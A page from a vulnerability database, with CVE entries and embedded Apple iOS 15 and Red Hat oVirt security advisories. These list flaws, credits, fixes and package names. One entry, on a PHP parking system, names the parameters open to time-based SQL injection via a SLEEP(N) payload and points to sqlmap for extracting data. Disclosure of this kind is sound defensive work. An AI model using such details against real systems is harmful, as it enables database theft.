VARIoT IoT vulnerabilities database
| VAR-202110-1410 | CVE-2021-30816 | iOS and iPadOS Vulnerability in |
CVSS V2: 2.1 CVSS V3: 2.4 Severity: LOW |
The issue was addressed with improved permissions logic. This issue is fixed in iOS 15 and iPadOS 15. An attacker with physical access to a device may be able to see private contact information. iOS and iPadOS Exists in unspecified vulnerabilities.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2021-10-26-9 Additional information for
APPLE-SA-2021-09-20-1 iOS 15 and iPadOS 15
iOS 15 and iPadOS 15 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT212814.
Accessory Manager
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2021-30837: Siddharth Aeri (@b1n4r1b01)
AppleMobileFileIntegrity
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A local attacker may be able to read sensitive information
Description: This issue was addressed with improved checks.
CVE-2021-30811: an anonymous researcher working with Compartir
Apple Neural Engine
Available for devices with Apple Neural Engine: iPhone 8 and later,
iPad Pro (3rd generation) and later, iPad Air (3rd generation) and
later, and iPad mini (5th generation)
Impact: A malicious application may be able to execute arbitrary code
with system privileges on devices with an Apple Neural Engine
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30838: proteas wang
bootp
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A device may be passively tracked by its WiFi MAC address
Description: A user privacy issue was addressed by removing the
broadcast MAC address.
CVE-2021-30866: Fabien Duchêne of UCLouvain (Belgium)
Entry added October 25, 2021
CoreAudio
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a malicious audio file may result in unexpected
application termination or arbitrary code execution
Description: A logic issue was addressed with improved state
management.
CVE-2021-30834: JunDong Xie of Ant Security Light-Year Lab
Entry added October 25, 2021
CoreML
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2021-30825: hjy79425575 working with Trend Micro Zero Day
Initiative
Face ID
Available for devices with Face ID: iPhone X, iPhone XR, iPhone XS
(all models), iPhone 11 (all models), iPhone 12 (all models), iPad
Pro (11-inch), and iPad Pro (3rd generation)
Impact: A 3D model constructed to look like the enrolled user may be
able to authenticate via Face ID
Description: This issue was addressed by improving Face ID anti-
spoofing models.
CVE-2021-30863: Wish Wu (吴潍浠 @wish_wu) of Ant-financial Light-Year
Security Lab
FaceTime
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: An attacker with physical access to a device may be able to
see private contact information
Description: The issue was addressed with improved permissions logic.
CVE-2021-30816: Atharv (@atharv0x0)
Entry added October 25, 2021
FaceTime
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: An application with microphone permission may unexpectedly
access microphone input during a FaceTime call
Description: A logic issue was addressed with improved validation.
CVE-2021-30882: Adam Bellard and Spencer Reitman of Airtime
Entry added October 25, 2021
FontParser
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a maliciously crafted font may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2021-30831: Xingwei Lin of Ant Security Light-Year Lab
Entry added October 25, 2021
FontParser
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a maliciously crafted dfont file may lead to
arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2021-30840: Xingwei Lin of Ant Security Light-Year Lab
Entry added October 25, 2021
FontParser
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a maliciously crafted dfont file may lead to
arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab
CVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab
CVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab
Foundation
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2021-30852: Yinyi Wu (@3ndy1) of Ant Security Light-Year Lab
Entry added October 25, 2021
iCloud Photo Library
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A malicious application may be able to access photo metadata
without needing permission to access photos
Description: The issue was addressed with improved authentication.
CVE-2021-30867: Csaba Fitzl (@theevilbit) of Offensive Security
Entry added October 25, 2021
ImageIO
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2021-30814: hjy79425575
Entry added October 25, 2021
ImageIO
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: This issue was addressed with improved checks.
CVE-2021-30835: Ye Zhang of Baidu Security
CVE-2021-30847: Mike Zhang of Pangu Lab
Kernel
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A race condition was addressed with improved locking.
CVE-2021-30857: Zweig of Kunlun Lab
libexpat
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed by updating expat to version
2.4.1.
CVE-2013-0340: an anonymous researcher
Model I/O
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a maliciously crafted USD file may disclose memory
contents
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2021-30819: Apple
NetworkExtension
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A VPN configuration may be installed by an app without user
permission
Description: An authorization issue was addressed with improved state
management.
CVE-2021-30874: Javier Vieira Boccardo (linkedin.com/javier-vieira-
boccardo)
Entry added October 25, 2021
Preferences
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: An application may be able to access restricted files
Description: A validation issue existed in the handling of symlinks.
CVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)
of Tencent Security Xuanwu Lab (xlab.tencent.com)
Preferences
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A logic issue was addressed with improved state
management.
CVE-2021-30854: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)
of Tencent Security Xuanwu Lab (xlab.tencent.com)
Quick Look
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Previewing an html file attached to a note may unexpectedly
contact remote servers
Description: A logic issue existed in the handling of document loads.
CVE-2021-30870: Saif Hamed Al Hinai Oman CERT
Entry added October 25, 2021
Sandbox
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A malicious application may be able to modify protected parts
of the file system
Description: This issue was addressed with improved checks.
CVE-2021-30808: Csaba Fitzl (@theevilbit) of Offensive Security
Entry added October 25, 2021
Siri
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: A local attacker may be able to view contacts from the lock
screen
Description: A lock screen issue allowed access to contacts on a
locked device.
CVE-2021-30815: an anonymous researcher
Telephony
Available for: iPhone SE (1st generation), iPad Pro 12.9-inch, iPad
Air 2, iPad (5th generation), and iPad mini 4
Impact: In certain situations, the baseband would fail to enable
integrity and ciphering protection
Description: A logic issue was addressed with improved state
management.
CVE-2021-30826: CheolJun Park, Sangwook Bae and BeomSeok Oh of KAIST
SysSec Lab
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Visiting a maliciously crafted website may reveal a user's
browsing history
Description: The issue was resolved with additional restrictions on
CSS compositing.
CVE-2021-30884: an anonymous researcher
Entry added October 25, 2021
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved state
handling.
CVE-2021-30818: Amar Menezes (@amarekano) of Zon8Research
Entry added October 25, 2021
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing a maliciously crafted audio file may disclose
restricted memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2021-30836: Peter Nguyen Vu Hoang of STAR Labs
Entry added October 25, 2021
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2021-30809: an anonymous researcher
Entry added October 25, 2021
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30846: Sergei Glazunov of Google Project Zero
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to code
execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30848: Sergei Glazunov of Google Project Zero
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2021-30849: Sergei Glazunov of Google Project Zero
WebKit
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to code
execution
Description: A memory corruption vulnerability was addressed with
improved locking.
CVE-2021-30851: Samuel Groß of Google Project Zero
Wi-Fi
Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2
and later, iPad 5th generation and later, iPad mini 4 and later, and
iPod touch (7th generation)
Impact: An attacker in physical proximity may be able to force a user
onto a malicious Wi-Fi network during device setup
Description: An authorization issue was addressed with improved state
management.
CVE-2021-30810: an anonymous researcher
Additional recognition
Assets
We would like to acknowledge Cees Elzinga for their assistance.
Bluetooth
We would like to acknowledge an anonymous researcher for their
assistance.
File System
We would like to acknowledge Siddharth Aeri (@b1n4r1b01) for their
assistance.
Sandbox
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive
Security for their assistance.
UIKit
We would like to acknowledge an anonymous researcher for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About
* The version after applying this update will be "15"
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmF4hy0ACgkQeC9qKD1p
rhiHNRAAwUaVHgd+whk6qGBZ3PYqSbvvuuo00rLW6JIqv9dwpEh9BBD//bSsUppb
41J5VaNoKDsonTLhXt0Mhn66wmhbGjLneMIoNb7ffl7O2xDQaWAr+HmoUm6wOo48
Kqj/wJGNJJov4ucBA6InpUz1ZevEhaPU4QMNedVck4YSl1GhtSTJsBAzVkMakQhX
uJ1fVdOJ5konmmQJLYxDUo60xqS0sZPchkwCM1zwR/SAZ70pt6P0MGI1Yddjcn1U
loAcKYVgkKAc9RWkXRskR1RxFBGivTI/gy5pDkLxfGfwFecf6PSR7MDki4xDeoVH
5FWXBwga8Uc/afGRqnFwTpdsisRZP8rQFwMam1T/DwgrWD8R2CCn/wOcvbtlWMIv
LczYCJFMELaXOjFF5duXaUJme97567OypYvhjBDtiIPg5MCGhZZCmpbRjkcUBZNJ
YQOELzq6CHWc96mjPOt34B0X2VXGhvgpQ0/evvcQe3bHv0F7N/acAlgsGe+e4Jn8
k0gWZocq+fPnl6YYgZKIGgcZWUl5bdqduApesEtpRU2ug2TE+xMOhMZXb1WLawJl
n/OtVHhIjft23r0MGgyWTIHMPe5DRvEPWGI3DS+55JX6XOxSGp9o6xgOAraZR4U6
HO/WbQOwj7SSKbyPxmDTp4OMyFPukbe92WIMh5EpFcILp6GTJqQ=
=lg51
-----END PGP SIGNATURE-----
| VAR-202110-1436 | CVE-2021-37805 | Vehicle Parking Management System Cross-site scripting vulnerability in |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
A Stored Cross Site Scripting (XSS) vunerability exists in Sourcecodeste Vehicle Parking Management System affected version 1.0 is via the add-vehicle.php endpoint
| VAR-202110-1082 | CVE-2021-38379 | CFEngine Enterprise Vulnerability regarding improper default permissions in |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
The Hub in CFEngine Enterprise 3.6.7 through 3.18.0 has Insecure Permissions that allow local Information Disclosure. CFEngine Enterprise There is a vulnerability in improper default permissions.Information may be obtained
| VAR-202110-1573 | CVE-2021-37806 | Vehicle Parking Management System In SQL Injection vulnerability |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
An SQL Injection vulnerability exists in https://phpgurukul.com Vehicle Parking Management System affected version 1.0. The system is vulnerable to time-based SQL injection on multiple endpoints. Based on the SLEEP(N) function payload that will sleep for a number of seconds used on the (1) editid , (2) viewid, and (3) catename parameters, the server response is about (N) seconds delay respectively which mean it is vulnerable to MySQL Blind (Time Based). An attacker can use sqlmap to further the exploitation for extracting sensitive information from the database
| VAR-202110-1391 | CVE-2021-41873 | Penguin Aurora TV Box Vulnerability in |
CVSS V2: 6.4 CVSS V3: 10.0 Severity: CRITICAL |
Penguin Aurora TV Box 41502 is a high-end network HD set-top box produced by Tencent Video and Skyworth Digital. An unauthorized access vulnerability exists in the Penguin Aurora Box. An attacker can use the vulnerability to gain unauthorized access to a specific link to remotely control the TV
| VAR-202110-1615 | CVE-2021-41183 | jQuery-UI Cross-site scripting vulnerability in |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of various `*Text` options of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. The values passed to various `*Text` options are now always treated as pure text, not HTML. A workaround is to not accept the value of the `*Text` options from untrusted sources. jQuery-UI Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig individual developer. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: RHV Manager (ovirt-engine) [ovirt-4.5.0] security update
Advisory ID: RHSA-2022:4711-01
Product: Red Hat Virtualization
Advisory URL: https://access.redhat.com/errata/RHSA-2022:4711
Issue date: 2022-05-26
CVE Names: CVE-2021-3807 CVE-2021-23425 CVE-2021-33502
CVE-2021-41182 CVE-2021-41183 CVE-2021-41184
====================================================================
1. Summary:
Updated ovirt-engine packages that fix several bugs and add various
enhancements are now available.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch
3. Description:
The ovirt-engine package provides the Red Hat Virtualization Manager, a
centralized management platform that allows system administrators to view
and manage virtual machines. The Manager provides a comprehensive range of
features including search capabilities, resource management, live
migrations, and virtual infrastructure provisioning.
Security Fix(es):
* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching
ANSI escape codes (CVE-2021-3807)
* nodejs-trim-off-newlines: ReDoS via string processing (CVE-2021-23425)
* normalize-url: ReDoS for data URLs (CVE-2021-33502)
* jquery-ui: XSS in the altField option of the datepicker widget
(CVE-2021-41182)
* jquery-ui: XSS in *Text options of the datepicker widget (CVE-2021-41183)
* jquery-ui: XSS in the 'of' option of the .position() util
(CVE-2021-41184)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
A list of bugs fixed in this update is available in the Technical Notes
book:
https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/2974891
5. Bugs fixed (https://bugzilla.redhat.com/):
655153 - [RFE] confirmation prompt when suspending a virtual machine - webadmin
977778 - [RFE] - Mechanism for converting disks for non-running VMS
1624015 - [RFE] Expose Console Options and Console invocation via API
1648985 - VM from VM-pool which is already in use by a SuperUser is presented to another User with UserRole permission who can shutdown the VM.
1667517 - [RFE] add VM Portal setting for set screen mode
1687845 - Multiple notification for one time host activation
1781241 - missing ?connect automatically? option in vm portal
1782056 - [RFE] Integration of built-in ipsec feature in RHV/RHHI-V with OVN
1849169 - [RFE] add virtualCPUs/physicalCPUs ratio property to evenly_distributed policy
1878930 - [RFE] Provide warning event if MAC Address Pool free and available addresses are below threshold
1922977 - [RFE] VM shared disks are not part of the OVF_STORE
1926625 - [RFE] How to enable HTTP Strict Transport Security (HSTS) on Apache HTTPD for Red Hat Virtualization Manager
1927985 - [RFE] Speed up export-to-OVA on NFS by aligning loopback device offset
1944290 - URL to change the password is not shown properly
1944834 - [RFE] Timer for Console Disconnect Action - Shutdown VM after N minutes of being disconnected (Webadmin-only)
1956295 - Template import from storage domain fails when quota is enabled.
1959186 - Enable assignment of user quota when provisioning from a non-blank template via rest-api
1964208 - [RFE] add new feature for VM's screenshot on RestAPI
1964461 - CVE-2021-33502 normalize-url: ReDoS for data URLs
1971622 - Incorrect warning displayed: "The VM CPU does not match the Cluster CPU Type"
1974741 - Disk images remain in locked state if the HE VM is rebooted during a image transfer
1979441 - High Performance VMs always have "VM CPU does not match the cluster CPU Type" warning
1979797 - Ask user for confirmation when the deleted storage domain has leases of VMs that has disk in other SDs
1980192 - Network statistics copy a U64 into DECIMAL(18,4)
1986726 - VM imported from OVA gets thin provisioned disk despite of allocation policy set as 'preallocated'
1986834 - [DOCS] add nodejs and maven to list of subscription streams to be enabled in RHVM installation
1987121 - [RFE] Support enabling nVidia Unified Memory on mdev vGPU
1988496 - vmconsole-proxy-helper.cer is not renewed when running engine-setup
1990462 - [RFE] Add user name and password to ELK integration
1991240 - Assign user quota when provisioning from a non-blank template via web-ui
1995793 - CVE-2021-23425 nodejs-trim-off-newlines: ReDoS via string processing
1996123 - ovf stores capacity/truesize on the storage does not match values in engine database
1998255 - [RFE] [UI] Add search box for vNIC Profiles in RHVM WebUI on the main vNIC profiles tab
1999698 - ssl.conf modifications of engine-setup do not conform to best practices (according to red hat insights)
2000031 - SPM host is rebooted multiple times when engine recovers the host
2002283 - Make NumOfPciExpressPorts configurable via engine-config
2003883 - Failed to update the VFs configuration of network interface card type 82599ES and X520
2003996 - ovirt_snapshot module fails to delete snapshot when there is a "Next Run configuration snapshot"
2006602 - vm_statistics table has wrong type for guest_mem_* columns.
2006745 - [MBS] Template disk Copy from data storage domain to Managed Block Storage domain is failing
2007384 - Failed to parse 'writeRate' value xxxx to integer: For input string: xxxx
2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes
2008798 - Older name rhv-openvswitch is not checked in ansible playbook
2010203 - Log analyzer creates faulty VM unmanaged devices report
2010903 - I/O operations/sec reporting wrong values
2013928 - Log analyzer creates faulty non default vdc_option report
2014888 - oVirt executive dashboard/Virtual Machine dashboard does not actually show disk I/O operations per second, but it shows sum of I/o operations since the boot time of VM
2015796 - [RFE] RHV Manager should support running on a host with DISA STIG security profile applied
2019144 - CVE-2021-41182 jquery-ui: XSS in the altField option of the datepicker widget
2019148 - CVE-2021-41183 jquery-ui: XSS in *Text options of the datepicker widget
2019153 - CVE-2021-41184 jquery-ui: XSS in the 'of' option of the .position() util
2021217 - [RFE] Windows 2022 support
2023250 - [RFE] Use virt:rhel module instead of virt:av in RHEL 8.6+ to get advanced virtualization packages
2023786 - RHV VM with SAP monitoring configuration does not fail to start if the Host is missing vdsm-hook-vhostmd
2024202 - RHV Dashboard does not show memory and storage details properly when using Spanish language.
2025936 - metrics configuration playbooks failing due to rhel-system-role last refactor
2030596 - [RFE] RHV Manager should support running on a host with the PCI-DSS security profile applied
2030663 - Update Network statistics types in DWH
2031027 - The /usr/share/ovirt-engine/ansible-runner-service-project/inventory/hosts fails rpm verification
2035051 - removing nfs-utils cause ovirt-engine removal due to cinderlib dep tree
2037115 - rhv-image-discrepancies (rhv-log-collector-analyzer-1.0.11-1.el8ev) tool continues flags OVF_STORE volumes.
2037121 - RFE: Add Data Center and Storage Domain name in the rhv-image-discrepancies tool output.
2040361 - Hotplug VirtIO-SCSI disk fails with error "Domain already contains a disk with that address" when IO threads > 1
2040402 - unable to use --log-size=0 option
2040474 - [RFE] Add progress tracking for Cluster Upgrade
2041544 - Admin GUI: Making selection of host while uploading disk it will immediately replace it with the first active host in the list.
2043146 - Expired /etc/pki/vdsm/libvirt-vnc/server-cert.pem certificate is skipped during Enroll Certificate
2044273 - Remove the RHV Guest Tools ISO image upload option from engine-setup
2048546 - sosreport command should be replaced by sos report
2050566 - Upgrade ovirt-log-collector to 4.4.5
2050614 - Upgrade rhvm-setup-plugins to 4.5.0
2051857 - Upgrade rhv-log-collector-analizer to 1.0.13
2052557 - RHV fails to release mdev vGPU device after VM shutdown
2052690 - [RFE] Upgrade to ansible-core-2.12 in ovirt-engine
2054756 - [welcome page] Add link to MTV guide
2055136 - virt module is not changed to the correct stream during host upgrade
2056021 - [BUG]: "Enroll Certificate" operation not updating libvirt-vnc cert and key
2056052 - RHV-H w/ PCI-DSS profile causes OVA export to fail
2056126 - [RFE] Extend time to warn of upcoming certificate expiration
2058264 - Export as OVA playbook gets stuck with 'found an incomplete artifacts directory...Possible ansible_runner error?'
2059521 - [RFE] Upgrade to ansible-core-2.12 in ovirt-engine-metrics
2059877 - [DOCS][Upgrade] Update RHVM update procedure in Upgrade guide
2061904 - Unable to attach a RHV Host back into cluster after removing due to networking
2065052 - [TRACKER] Upgrade to ansible-core-2.12 in RHV 4.4 SP1
2066084 - vmconsole-proxy-user certificate expired - cannot access serial console
2066283 - Upgrade from RHV 4.4.10 to RHV 4.5.0 is broken
2069972 - [Doc][RN]Add cluster-level 4.7 to compatibility table
2070156 - [TESTONLY] Test upgrade from ovirt-engine-4.4.1
2071468 - Engine fenced host that was already reconnected and set to Up status.
2072637 - Build and distribute python38-daemon in RHV channels
2072639 - Build and distribute ansible-runner in RHV channels
2072641 - Build and distribute python38-docutils in RHV channels
2072642 - Build and distribute python38-lockfile in RHV channels
2072645 - Build and distribute python38-pexpect in RHV channels
2072646 - Build and distribute python38-ptyprocess in RHV channels
2075352 - upgrading RHV-H does not renew certificate
6. Package List:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:
Source:
ansible-runner-2.1.3-1.el8ev.src.rpm
apache-sshd-2.8.0-0.1.el8ev.src.rpm
engine-db-query-1.6.4-1.el8ev.src.rpm
ovirt-dependencies-4.5.1-1.el8ev.src.rpm
ovirt-engine-4.5.0.7-0.9.el8ev.src.rpm
ovirt-engine-dwh-4.5.2-1.el8ev.src.rpm
ovirt-engine-metrics-1.6.0-1.el8ev.src.rpm
ovirt-engine-ui-extensions-1.3.3-1.el8ev.src.rpm
ovirt-log-collector-4.4.5-1.el8ev.src.rpm
ovirt-web-ui-1.8.1-2.el8ev.src.rpm
rhv-log-collector-analyzer-1.0.13-1.el8ev.src.rpm
rhvm-branding-rhv-4.4.11-1.el8ev.src.rpm
rhvm-setup-plugins-4.5.0-2.el8ev.src.rpm
vdsm-jsonrpc-java-1.7.1-2.el8ev.src.rpm
noarch:
ansible-runner-2.1.3-1.el8ev.noarch.rpm
apache-sshd-2.8.0-0.1.el8ev.noarch.rpm
apache-sshd-javadoc-2.8.0-0.1.el8ev.noarch.rpm
engine-db-query-1.6.4-1.el8ev.noarch.rpm
ovirt-dependencies-4.5.1-1.el8ev.noarch.rpm
ovirt-engine-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-backend-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-dbscripts-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-dwh-4.5.2-1.el8ev.noarch.rpm
ovirt-engine-dwh-grafana-integration-setup-4.5.2-1.el8ev.noarch.rpm
ovirt-engine-dwh-setup-4.5.2-1.el8ev.noarch.rpm
ovirt-engine-health-check-bundler-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-metrics-1.6.0-1.el8ev.noarch.rpm
ovirt-engine-restapi-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-base-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-plugin-cinderlib-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-plugin-imageio-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-plugin-ovirt-engine-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-plugin-ovirt-engine-common-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-setup-plugin-websocket-proxy-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-tools-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-tools-backup-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-ui-extensions-1.3.3-1.el8ev.noarch.rpm
ovirt-engine-vmconsole-proxy-helper-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-webadmin-portal-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-engine-websocket-proxy-4.5.0.7-0.9.el8ev.noarch.rpm
ovirt-log-collector-4.4.5-1.el8ev.noarch.rpm
ovirt-web-ui-1.8.1-2.el8ev.noarch.rpm
python3-ovirt-engine-lib-4.5.0.7-0.9.el8ev.noarch.rpm
python38-ansible-runner-2.1.3-1.el8ev.noarch.rpm
python38-docutils-0.14-12.4.el8ev.noarch.rpm
rhv-log-collector-analyzer-1.0.13-1.el8ev.noarch.rpm
rhvm-4.5.0.7-0.9.el8ev.noarch.rpm
rhvm-branding-rhv-4.4.11-1.el8ev.noarch.rpm
rhvm-setup-plugins-4.5.0-2.el8ev.noarch.rpm
vdsm-jsonrpc-java-1.7.1-2.el8ev.noarch.rpm
vdsm-jsonrpc-java-javadoc-1.7.1-2.el8ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2021-3807
https://access.redhat.com/security/cve/CVE-2021-23425
https://access.redhat.com/security/cve/CVE-2021-33502
